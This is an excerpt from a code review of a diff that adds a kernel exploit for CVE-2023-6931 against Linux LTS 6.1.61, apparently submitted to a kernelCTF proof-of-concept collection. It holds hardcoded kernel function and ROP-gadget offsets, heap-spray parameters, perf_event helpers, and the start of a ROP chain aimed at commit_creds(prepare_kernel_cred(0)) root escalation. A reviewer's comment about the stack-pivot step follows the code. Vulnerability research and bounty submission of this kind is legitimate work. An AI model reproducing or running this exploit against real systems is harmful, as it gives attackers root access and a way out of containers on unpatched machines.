pocs/linux/kernelctf/CVE-2023-6931_lts_cos/exploit/lts-6.1.61/exploit.c

```diff
@@ -0,0 +1,324 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sched.h>
+#include <string.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <stdint.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/xattr.h>
+#include <sys/resource.h>
+#include <linux/perf_event.h>
+#include <linux/hw_breakpoint.h>
+#include <linux/netlink.h>
+#include <linux/rtnetlink.h>
+#include <linux/membarrier.h>
+
+#define READ_BUF_SIZE 2048
+
+#define SK_RCU_OFF 744
+#define SK_DESTRUCT_OFF 720
+#define JOP_OFF (READ_BUF_SIZE - SK_RCU_OFF + SK_DESTRUCT_OFF - XATTR_HDR_LEN)
+
+#define XATTR_HDR_LEN 32
+#define XATTR_DATA_LEN1 (READ_BUF_SIZE/2)
+#define XATTR_DATA_LEN2 (JOP_OFF + 8)
+
+/* How far out to inc */
+#define OOB_LOC1 688
+#define OOB_LOC2 1040
+/* Target event fds */
+#define TFD1 ((READ_BUF_SIZE - 8 + OOB_LOC1)/8)
+#define TFD2 ((READ_BUF_SIZE - 8 + OOB_LOC2)/8)
+/* Number of increments */
+#define NUM_INCS1 0x830
+#define NUM_INCS2 0xf
+
+#define NUM_SIBLINGS (65536/8 - 1 + READ_BUF_SIZE/8)
+
+#define OBJS_PER_SLAB 16
+
+#define SOCK_SLABS (2*OBJS_PER_SLAB)
+#define SOCK_SPRAY (SOCK_SLABS*OBJS_PER_SLAB)
+
+#define XATTR_SPRAY1 1000
+#define XATTR_SPRAY2 (SOCK_SLABS+OBJS_PER_SLAB)
+
+#define PREPARE_KERNEL_CRED 0x1bb6b0
+#define COMMIT_CREDS 0x1bb410
+#define FIND_TASK_BY_VPID 0x1b1df0
+#define SWITCH_TASK_NAMESPACES 0x1b9880
+
+#define DO_SYS_VFORK 0x18c3b0
+#define MSLEEP 0x224be0
+
+#define INIT_NSPROXY 0x2676600
+
+#define MOV_RSP_RBP_POP_RBP_RET 0x12aeac
+#define POP_RDI_RET_THUNK 0x0d8a3a
+#define POP_RSI_RET_THUNK 0x04899f
+#define MOV_RDI_RAX_POP_RBX_RET_THUNK 0x0d4f31
+
+#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0)
+
+struct perf_event_attr attr;
+
+int sib_fds[NUM_SIBLINGS];
+
+long read_buf[8192];
+
+int xattr_fd;
+
+char xattr_data[XATTR_DATA_LEN2];
+
+/*
+ * Syscall wrappers.
+ */
+
+int perf_event_open(struct perf_event_attr *attr, pid_t pid, unsigned int cpu, int group_fd, unsigned long flags)
+{
+    return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
+}
+
+int membarrier(unsigned int flags, int cpu_id) {
+    return syscall(SYS_membarrier, flags, cpu_id);
+}
+
+void pin_cpu () {
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(0, &set);
+    if (sched_setaffinity(0, sizeof(set), &set))
+        err_exit("[-] sched_setaffinity");
+}
+
+void set_attr (void) {
+    attr.type = PERF_TYPE_SOFTWARE;
+    attr.size = sizeof(attr);
+    attr.config = PERF_COUNT_SW_PAGE_FAULTS;
+    attr.disabled = 1;
+    attr.exclude_kernel = 1;
+    attr.exclude_hv = 1;
+}
+
+void prepare_rop (long *rop, long kbase) {
+    rop[JOP_OFF/8] = kbase + MOV_RSP_RBP_POP_RBP_RET;
+
+    rop += (JOP_OFF - SK_DESTRUCT_OFF)/8;
+    /* commit_creds(prepare_kernel_cred(0)) */
+    rop++;
```

Comment:
This `rop++` is still part fo the stack pivot based of `pop rbp` and not related to `commit_creds`, right? Maybe move one line up (before `commit_creds`) and add a comment that this line is for skipping `pop rbp`?